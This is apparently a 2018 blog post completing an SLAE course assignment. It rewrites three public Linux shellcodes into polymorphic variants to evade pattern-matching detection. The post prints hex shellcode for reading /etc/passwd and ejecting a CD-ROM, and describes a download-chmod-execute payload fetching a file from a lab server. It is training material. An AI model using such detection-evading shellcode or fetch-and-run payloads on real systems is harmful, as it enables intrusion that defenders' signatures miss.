Friday, November 30, 2018

SLAE - Assignment 6 - Polymorphism

  • Take up 3 shellcodes from Shell-storm and create polymorphic versions of them to beat pattern matching
  • The polymorphic versions cannot be larger than 150% of the existing shellcode
  • Bonus points for making it shorter in length than original

Basic principles:
  • Replace instructions with equivalent functionality ones (so that functionality is preserverd)
  • Add garbage instructions that dont change the functionality in any way (NOP equivalents)
(A) displaying content of etc/passwd
Source:
http://shell-storm.org/shellcode/files/shellcode-571.php
(43 Bytes)

It needed some work to revert this to a nasm file as the comments are somewhat mixed up (AT&T vs intel syntax, extra space)
Some remodeling fixed it:
 
Just checking of my interpretation of this was right. Will do that by dumping the shellcode with the objdump command:
nelis@slae:~/SLAE/assignment6$ objdump -d ./shell571|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g' "\x31\xc0\x99\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"

Quick scan reveals no differences in the shellcode I generated and the shellcode as mentioned in the original download.

Now we make some alterations to the original code to prevent pattern detection. Here you see the changes in relation to the original instructions: Ultimately this leads to a new file, which I'll call headpass.nasm:

Size of this shellcode is 61 bytes, Which just fits in the maximum allowed (43*150% = 64 bytes)

Since I  was confident this instruction set was different enough than its source I figured I was going to try and submit it to exploit-db. Those extra points could come in handly, right:

Tadaa! There it is. Published on exploit-db:

https://www.exploit-db.com/shellcodes/45940


 (B) Download, chmod and execute:
http://shell-storm.org/shellcode/files/shellcode-862.php

Need to change ip address at least. Have setup server with IP adress 192.168.1.48 with HTTP server offering a file.

192.168.1.48/x

>>> "192.168.1.48///x"[::-1].encode('hex')
782f2f2f 38342e31 2e383631 2e323931


content of x:
#!/bin/bash
echo This is a test
Seems to be working just fine at the moment

nelis@slae:~/SLAE/assignment6$ ls -al x
-rwxrwxrwx 1 nelis nelis 36 Dec 1 19:44 x
There it is!! with the modified permissions

So we confirmed its working. Time for a breakdown of the assembly code:


The lines that have have changed instructions have been marked with ***

Note that this shellcode has a fork/child construction, in order to debug de child process with GDB, I had to discover how to setup GDB accordingly. Learned that by using the "set follow-fork-mode child" I was able to debug the newly created child process

This final polymorphic code is 101 bytes in size. Original version was 108 bytes, in addition to defeating pattern detection, the size has also decreased with 7 bytes.


(C) Eject CDROM drive

Shellcode for ejecting cdrom...(after confirming my PC still has a cd rom drive)

http://shell-storm.org/shellcode/files/shellcode-621.php

Original shellcode (46 bytes):

"\x6a\x0b\x58\x99\x52"
"\x6a\x6d\x68\x63\x64"
"\x72\x6f\x89\xe1\x52"
"\x66\x68\x63\x74\x68"
"\x2f\x65\x6a\x65\x68"
"\x2f\x62\x69\x6e\x68"
"\x2f\x75\x73\x72\x89"
"\xe3\x52\x51\x53\x89"
"\xe1\xcd\x80\x40\xcd"
"\x80"

Lets try and reverse this to assembly instructions:
So, before actually running this untrusted shellcode we first perform some debugging:
We include the shellcode in a C-file and debug that.
So we now have the assembly instructions ready for debugging and in the process validated that no harm will be done by executing this shellcode.  Now we make some modifications to the originating code and put it in our template file:  
The lines that have have changed instructions have been marked with *** and changes are commented.

Again we used python to do the hex encoding and reversing:

nelis@slae:~$ python
Python 2.7.3 (default, Feb 27 2014, 19:39:10)
[GCC 4.7.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> "//usr/bin//eject"[::-1].encode('hex')
'7463656a652f2f6e69622f7273752f2f'
>>>
7463656a 652f2f6e 69622f72 73752f2f

push 0x7463656a ;tcej
push 0x652f2f6e ;e/ni
push 0x69622f72 ;b/re
push 0x73752f2f ;su//

We assemble, link, compile (compile.sh) and run and magically the cdrom drives opens using a shellcode that is completely different and decreased in size from 46 to 37 bytes!
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)